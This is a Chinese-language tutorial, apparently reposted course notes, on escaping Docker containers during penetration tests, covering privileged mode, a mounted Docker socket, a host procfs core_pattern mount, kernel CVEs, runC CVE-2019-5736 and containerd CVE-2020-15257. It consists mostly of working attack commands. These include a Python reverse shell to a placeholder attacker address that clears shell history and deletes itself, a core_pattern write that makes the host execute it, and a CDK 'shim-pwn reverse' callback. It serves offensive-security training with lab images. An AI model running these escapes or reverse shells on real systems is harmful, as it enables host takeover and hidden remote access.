简介
参考链接(https://wiki.teamssix.com/CloudNative/)
1、前渗透-判断是不是在Docker中
没有权限:端口扫描详细信息,根据应用对象表现
拿到权限:https://blog.csdn.net/qq_23936389/article/details/131486643
2、前渗透-镜像中的应用漏洞
通过漏洞测试获得
3、前渗透-镜像中的默认配置
4、后渗透-三种安全容器逃逸
-特权模式启动导致(不安全启动 适用于java jsp高权限无需提权 还要提权才能逃逸)
-危险挂载启动导致(危险启动 适用于java jsp高权限无需提权 还要提权才能逃逸)
-docker自身&系统漏洞(软件漏洞和系统漏洞 都可用)
容器逃逸-特权模式
启动靶场:docker run --rm --privileged=true -it alpine
判断有docker的标志
判断特权:cat /proc/self/status | grep CapEff
查看目录:fdisk -l
特权逃逸:mkdir /test && mount /dev/vda1 /test
判断结果:cd /test/ && ls
发现已经逃逸出来
容器逃逸-危险挂载
1、挂载Docker Socket逃逸
启动靶场:docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
进入环境:docker exec -it with_docker_sock /bin/bash
检测环境:ls -lah /var/run/docker.sock,Docker Socket 用来与守护进程通信即查询信息或者下发命令。
挂载逃逸:
apt-get update
apt-get install curl
curl -fsSL https://get.docker.com/ | sh
在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部,发现逃逸到主机目录
docker run -it -v /:/host ubuntu /bin/bash
chroot /host
2、挂载宿主机procfs逃逸
procfs是一个伪文件系统,它动态反映着系统内进程及其他组件的状态,其中有许多十分敏感重要的文件。因此,将宿主机的procfs挂载到不受控的容器中也是十分危险的,尤其是在该容器内默认启用root权限,且没有开启User Namespace时。
Docker默认情况下不会为容器开启 User Namespace
从 2.6.19 内核版本开始,Linux 支持在 /proc/sys/kernel/core_pattern 中使用新语法。如果该文件中的首个字符是管道符 | ,那么该行的剩余内容将被当作用户空间程序或脚本解释并执行。
一般情况下不会将宿主机的 procfs 挂载到容器中,然而有些业务为了实现某些特殊需要,还是会有这种情况发生。
https://github.com/Metarget/metarget/tree/master/writeups_cnv/mount-host-procfs
启动环境:docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu
检测环境:find / -name core_pattern 判断是不是procfs逃逸
如果找到两个 core_pattern 文件,那可能就是挂载了宿主机的 procfs
查找路径:(workdir) cat /proc/mounts | grep docker
这就表示当前绝对路径为
/var/lib/docker/overlay2/5717cb9154218ec49579ae338cd1c236694d6a377d61fd6d17e11e49d1b1baad/merged
写入文件:
cat >/tmp/.x.py << EOF
#!/usr/bin/python
import os
import pty
import socket
lhost = “xx.xx.xx.xx”
lport = xxxx
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv(“HISTFILE”, ‘/dev/null’)
pty.spawn(“/bin/bash”)
os.remove(‘/tmp/.x.py’)
s.close()
if name == “main”:
main()
EOF
给 Shell 赋予执行权限
chmod +x /tmp/.x.py
写入反弹 shell 到目标的 proc 目录下
echo -e "|/var/lib/docker/overlay2/4aac278b06d86b0d7b6efa4640368820c8c16f1da8662997ec1845f3cc69ccee/merged/tmp/.x.py \rcore " > /host/sys/kernel/core_pattern
cat >/tmp/x.c << EOF
#include <stdio.h>
int main(void)
{
int *a = NULL;
*a = 1;
return 0;
}
EOF
gcc x.c -o x
执行文件:
./x
nc -lvvp xxxx
1、高权限-Web入口到Docker逃逸(Java)
docker run --rm --privileged=true -it -p 8888:8080 vulfocus/shiro-721
2、低权限-Web入口到Docker逃逸(PHP)
docker run --rm --privileged=true -it -p 8080:80 sagikazarmark/dvwa
容器逃逸&内核漏洞
细节部分在权限提升章节会详解,常用:
CVE-2016-5195
CVE-2019-16884
CVE-2021-3493
CVE-2021-22555
CVE-2022-0492
CVE-2022-0847
CVE-2022-23222
容器逃逸&版本漏洞
CVE-2019-5736 runC容器逃逸
Docker version <= 18.09.2
RunC version <= 1.0-rc6
1、安装docker对应版本
apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository “deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable”
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1ce3-0~ubuntu
2、启动环境测试:
docker run -itd --cap-add=SYS_ADMIN ubuntu:latest
3、编译修改后EXP后等待管理进入执行
编译
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
mian文件上传到docker容器里
docker cp main 7f4793f3ac0cd13:/
还有一个条件就是执行main文件后需要管理员进入该容器进行触发
之后反弹逃逸
docker exec -it 7f4793f3ac0cd13 /bin/bash
4、实验获取到docker搭建的Web权限后进行逃逸
docker run -it -p 8888:8080 vulhub/struts2:s2-053
-CVE-2020-15257 containerd逃逸
containerd < 1.4.3
containerd < 1.3.9
1、安装docker对应版本
apt-get update
apt-get install ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
add-apt-repository “deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable”
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=5:19.03.63-0ubuntu-xenial docker-ce-cli=5:19.03.63-0ubuntu-xenial containerd.io=1.2.4-1
2、启动环境测试:
docker pull ubuntu:18.04
docker run -itd --net=host ubuntu:18.04 /bin/bash
docker exec -it 5be3ed60f152 /bin/bash
3、上传CDK自动提权反弹
docker cp cdk_linux_amd64 8e7c27d7b98ca32927:/tmp
chmod 777 cdk_linux_amd64
./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx
4、实验获取到docker搭建的Web权限后进行逃逸
docker run -it -p 8888:8080 vulhub/struts2:s2-053
容器逃逸&CDK自动化
检测利用:https://github.com/cdk-team/CDK
常规检测:https://github.com/teamssix/container-escape-check
演示:挂载模式 特权模式 CVE-2020-15257等
实现:信息收集,指定逃逸,自动逃逸,修复功能等
版权归原作者 nihao6666hhhhh 所有, 如有侵权,请联系我们删除。